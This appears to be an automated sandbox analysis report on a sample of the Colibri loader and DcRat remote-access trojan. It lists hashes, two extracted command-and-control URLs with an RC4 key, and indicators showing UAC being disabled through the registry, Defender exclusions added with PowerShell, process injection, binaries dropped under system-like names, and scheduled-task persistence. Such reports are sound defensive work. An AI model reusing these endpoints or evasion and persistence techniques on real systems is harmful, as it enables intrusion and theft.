colibri | 43f8b28bff64dc200d51657f0f0aafd27125f9489e7c06fc109a22e58eadebc3

Analysis

max time kernel
118s
max time network
117s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
12/09/2024, 14:16 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

443110dabe7095bf8afe27bf3dc27f60N.exe
Size

4.9MB
MD5

443110dabe7095bf8afe27bf3dc27f60
SHA1

03554dc5583fd4d38124bf4f65405faadf61543e
SHA256

43f8b28bff64dc200d51657f0f0aafd27125f9489e7c06fc109a22e58eadebc3
SHA512

aca75451bf62ffa71190bcac77606c1dae1edf9813ded3443c2a5f6535a71ee2809bbf3889e31b40cc9dcccf85675e67be9103329e6e7566b157f2b004da5070
SSDEEP

49152:rl5MTGChZpxtlBBgxchXb/zqP6DUtRgs5q289dAnSz44hnW1XgnYu6fYmPkMSx8E:

Score

10^/10

colibri dcrat build1 discovery evasion execution infostealer loader rat trojan

Malware Config

Extracted

Family

colibri

Version

1.2.0

Botnet

Build1

http://zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc/gate.php

http://yugyuvyugguitgyuigtfyutdtoghghbbgyv.cx/gate.php

rc4.plain

1
hf9qkeO66MP7WJXkg9rp

Signatures

Colibri Loader
A loader sold as MaaS first seen in August 2021.
loader colibri
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

Process spawned unexpected child process 30 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1088	3424	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1848	3424	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2628	3424	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1332	3424	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4980	3424	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4208	3424	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4712	3424	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3356	3424	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1400	3424	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4740	3424	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3596	3424	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	228	3424	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2580	3424	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4940	3424	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4776	3424	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	756	3424	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3052	3424	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3436	3424	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4624	3424	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2232	3424	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3880	3424	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2100	3424	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4768	3424	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4640	3424	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3824	3424	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4956	3424	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4112	3424	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4944	3424	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4912	3424	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1308	3424	schtasks.exe	86

UAC bypass 3 TTPs 39 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	443110dabe7095bf8afe27bf3dc27f60N.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	443110dabe7095bf8afe27bf3dc27f60N.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	443110dabe7095bf8afe27bf3dc27f60N.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	sihost.exe

DCRat payload 1 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

resource	yara_rule
behavioral2/memory/2944-3-0x000000001B8A0000-0x000000001B9CE000-memory.dmp	dcrat

Command and Scripting Interpreter: PowerShell 1 TTPs 11 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3996	powershell.exe
3604	powershell.exe
2180	powershell.exe
2412	powershell.exe
1736	powershell.exe
3556	powershell.exe
1412	powershell.exe
1996	powershell.exe
2296	powershell.exe
928	powershell.exe
1852	powershell.exe

Checks computer location settings 2 TTPs 13 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation	sihost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation	sihost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation	sihost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation	sihost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation	sihost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation	sihost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation	sihost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation	sihost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation	sihost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation	443110dabe7095bf8afe27bf3dc27f60N.exe
Key value queried	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation	sihost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation	sihost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation	sihost.exe

Executes dropped EXE 43 IoCs

pid	Process
1364	tmp95CC.tmp.exe
1188	tmp95CC.tmp.exe
428	tmp95CC.tmp.exe
536	tmp95CC.tmp.exe
4132	sihost.exe
4748	tmpCA93.tmp.exe
3524	tmpCA93.tmp.exe
1412	tmpCA93.tmp.exe
3536	sihost.exe
640	tmpFBA6.tmp.exe
4248	tmpFBA6.tmp.exe
4556	sihost.exe
712	sihost.exe
2100	tmp48FB.tmp.exe
860	tmp48FB.tmp.exe
4264	tmp48FB.tmp.exe
2216	sihost.exe
5112	tmp65F8.tmp.exe
4252	tmp65F8.tmp.exe
3652	sihost.exe
1400	tmp8529.tmp.exe
4700	tmp8529.tmp.exe
4708	sihost.exe
2080	tmpB64B.tmp.exe
3352	tmpB64B.tmp.exe
3488	sihost.exe
2828	tmpD3D5.tmp.exe
2628	tmpD3D5.tmp.exe
1464	tmpD3D5.tmp.exe
5112	tmpD3D5.tmp.exe
1820	sihost.exe
3632	tmpEE82.tmp.exe
4464	tmpEE82.tmp.exe
1504	sihost.exe
536	tmpBAE.tmp.exe
3388	tmpBAE.tmp.exe
1368	tmpBAE.tmp.exe
1788	sihost.exe
3880	tmp3CC1.tmp.exe
2216	tmp3CC1.tmp.exe
3664	sihost.exe
4488	tmp57EA.tmp.exe
3516	tmp57EA.tmp.exe

Checks whether UAC is enabled 1 TTPs 26 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	sihost.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	sihost.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sihost.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sihost.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	443110dabe7095bf8afe27bf3dc27f60N.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sihost.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sihost.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	sihost.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	sihost.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sihost.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	443110dabe7095bf8afe27bf3dc27f60N.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sihost.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	sihost.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	sihost.exe

Suspicious use of SetThreadContext 12 IoCs

description	pid	Process	procid_target
PID 428 set thread context of 536	428	tmp95CC.tmp.exe	123
PID 3524 set thread context of 1412	3524	tmpCA93.tmp.exe	159
PID 640 set thread context of 4248	640	tmpFBA6.tmp.exe	165
PID 860 set thread context of 4264	860	tmp48FB.tmp.exe	177
PID 5112 set thread context of 4252	5112	tmp65F8.tmp.exe	183
PID 1400 set thread context of 4700	1400	tmp8529.tmp.exe	189
PID 2080 set thread context of 3352	2080	tmpB64B.tmp.exe	195
PID 1464 set thread context of 5112	1464	tmpD3D5.tmp.exe	203
PID 3632 set thread context of 4464	3632	tmpEE82.tmp.exe	209
PID 3388 set thread context of 1368	3388	tmpBAE.tmp.exe	216
PID 3880 set thread context of 2216	3880	tmp3CC1.tmp.exe	222
PID 4488 set thread context of 3516	4488	tmp57EA.tmp.exe	228

Drops file in Program Files directory 20 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\7-Zip\Lang\RCXA216.tmp	443110dabe7095bf8afe27bf3dc27f60N.exe
File created	C:\Program Files (x86)\Internet Explorer\eddb19405b7ce1	443110dabe7095bf8afe27bf3dc27f60N.exe
File created	C:\Program Files (x86)\Windows Photo Viewer\de-DE\fontdrvhost.exe	443110dabe7095bf8afe27bf3dc27f60N.exe
File created	C:\Program Files\7-Zip\Lang\RuntimeBroker.exe	443110dabe7095bf8afe27bf3dc27f60N.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\Install\RCX92FB.tmp	443110dabe7095bf8afe27bf3dc27f60N.exe
File opened for modification	C:\Program Files (x86)\Internet Explorer\RCX950F.tmp	443110dabe7095bf8afe27bf3dc27f60N.exe
File opened for modification	C:\Program Files (x86)\Internet Explorer\backgroundTaskHost.exe	443110dabe7095bf8afe27bf3dc27f60N.exe
File opened for modification	C:\Program Files (x86)\Windows Photo Viewer\de-DE\RCX9BBA.tmp	443110dabe7095bf8afe27bf3dc27f60N.exe
File opened for modification	C:\Program Files\7-Zip\Lang\RuntimeBroker.exe	443110dabe7095bf8afe27bf3dc27f60N.exe
File created	C:\Program Files\VideoLAN\VLC\lua\winlogon.exe	443110dabe7095bf8afe27bf3dc27f60N.exe
File created	C:\Program Files\VideoLAN\VLC\lua\cc11b995f2a76d	443110dabe7095bf8afe27bf3dc27f60N.exe
File opened for modification	C:\Program Files (x86)\Windows Photo Viewer\de-DE\fontdrvhost.exe	443110dabe7095bf8afe27bf3dc27f60N.exe
File created	C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\Install\lsass.exe	443110dabe7095bf8afe27bf3dc27f60N.exe
File created	C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\Install\6203df4a6bafc7	443110dabe7095bf8afe27bf3dc27f60N.exe
File created	C:\Program Files\7-Zip\Lang\9e8d7a4ca61bd9	443110dabe7095bf8afe27bf3dc27f60N.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\Install\lsass.exe	443110dabe7095bf8afe27bf3dc27f60N.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\RCXA41B.tmp	443110dabe7095bf8afe27bf3dc27f60N.exe
File created	C:\Program Files (x86)\Internet Explorer\backgroundTaskHost.exe	443110dabe7095bf8afe27bf3dc27f60N.exe
File created	C:\Program Files (x86)\Windows Photo Viewer\de-DE\5b884080fd4f94	443110dabe7095bf8afe27bf3dc27f60N.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\winlogon.exe	443110dabe7095bf8afe27bf3dc27f60N.exe

Drops file in Windows directory 17 IoCs

description	ioc	Process
File created	C:\Windows\Logs\HomeGroup\csrss.exe	443110dabe7095bf8afe27bf3dc27f60N.exe
File created	C:\Windows\es-ES\services.exe	443110dabe7095bf8afe27bf3dc27f60N.exe
File created	C:\Windows\schemas\886983d96e3d3e	443110dabe7095bf8afe27bf3dc27f60N.exe
File opened for modification	C:\Windows\schemas\RCXA002.tmp	443110dabe7095bf8afe27bf3dc27f60N.exe
File opened for modification	C:\Windows\Performance\dllhost.exe	443110dabe7095bf8afe27bf3dc27f60N.exe
File created	C:\Windows\Performance\5940a34987c991	443110dabe7095bf8afe27bf3dc27f60N.exe
File opened for modification	C:\Windows\es-ES\services.exe	443110dabe7095bf8afe27bf3dc27f60N.exe
File created	C:\Windows\es-ES\c5b4cb5e9653cc	443110dabe7095bf8afe27bf3dc27f60N.exe
File opened for modification	C:\Windows\Logs\HomeGroup\csrss.exe	443110dabe7095bf8afe27bf3dc27f60N.exe
File opened for modification	C:\Windows\es-ES\RCX9DCE.tmp	443110dabe7095bf8afe27bf3dc27f60N.exe
File opened for modification	C:\Windows\schemas\csrss.exe	443110dabe7095bf8afe27bf3dc27f60N.exe
File created	C:\Windows\Performance\dllhost.exe	443110dabe7095bf8afe27bf3dc27f60N.exe
File created	C:\Windows\rescache\Registry.exe	443110dabe7095bf8afe27bf3dc27f60N.exe
File created	C:\Windows\Logs\HomeGroup\886983d96e3d3e	443110dabe7095bf8afe27bf3dc27f60N.exe
File created	C:\Windows\schemas\csrss.exe	443110dabe7095bf8afe27bf3dc27f60N.exe
File opened for modification	C:\Windows\Performance\RCX9079.tmp	443110dabe7095bf8afe27bf3dc27f60N.exe
File opened for modification	C:\Windows\Logs\HomeGroup\RCX9724.tmp	443110dabe7095bf8afe27bf3dc27f60N.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 19 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tmp65F8.tmp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tmpD3D5.tmp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tmpEE82.tmp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tmp3CC1.tmp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tmp95CC.tmp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tmp95CC.tmp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tmpCA93.tmp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tmp48FB.tmp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tmp57EA.tmp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tmp95CC.tmp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tmpCA93.tmp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tmp48FB.tmp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tmpD3D5.tmp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tmpFBA6.tmp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tmpB64B.tmp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tmpD3D5.tmp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tmpBAE.tmp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tmp8529.tmp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tmpBAE.tmp.exe

Modifies registry class 13 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings	443110dabe7095bf8afe27bf3dc27f60N.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings	sihost.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 30 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
756	schtasks.exe
3436	schtasks.exe
2232	schtasks.exe
4980	schtasks.exe
3356	schtasks.exe
228	schtasks.exe
4912	schtasks.exe
1088	schtasks.exe
2628	schtasks.exe
1400	schtasks.exe
3052	schtasks.exe
4624	schtasks.exe
4956	schtasks.exe
1308	schtasks.exe
4640	schtasks.exe
1332	schtasks.exe
4712	schtasks.exe
4740	schtasks.exe
4944	schtasks.exe
4208	schtasks.exe
2580	schtasks.exe
3880	schtasks.exe
2100	schtasks.exe
3824	schtasks.exe
4776	schtasks.exe
4768	schtasks.exe
4112	schtasks.exe
1848	schtasks.exe
3596	schtasks.exe
4940	schtasks.exe

Suspicious behavior: EnumeratesProcesses 51 IoCs

pid	Process
2944	443110dabe7095bf8afe27bf3dc27f60N.exe
2944	443110dabe7095bf8afe27bf3dc27f60N.exe
2944	443110dabe7095bf8afe27bf3dc27f60N.exe
2944	443110dabe7095bf8afe27bf3dc27f60N.exe
2944	443110dabe7095bf8afe27bf3dc27f60N.exe
2412	powershell.exe
2412	powershell.exe
3604	powershell.exe
3604	powershell.exe
1412	powershell.exe
1412	powershell.exe
1852	powershell.exe
1852	powershell.exe
2296	powershell.exe
2296	powershell.exe
2180	powershell.exe
2180	powershell.exe
1996	powershell.exe
1996	powershell.exe
928	powershell.exe
928	powershell.exe
1736	powershell.exe
1736	powershell.exe
3996	powershell.exe
3996	powershell.exe
3556	powershell.exe
3556	powershell.exe
1852	powershell.exe
2412	powershell.exe
2412	powershell.exe
3604	powershell.exe
1412	powershell.exe
2296	powershell.exe
1996	powershell.exe
928	powershell.exe
2180	powershell.exe
3996	powershell.exe
1736	powershell.exe
3556	powershell.exe
4132	sihost.exe
3536	sihost.exe
4556	sihost.exe
712	sihost.exe
2216	sihost.exe
3652	sihost.exe
4708	sihost.exe
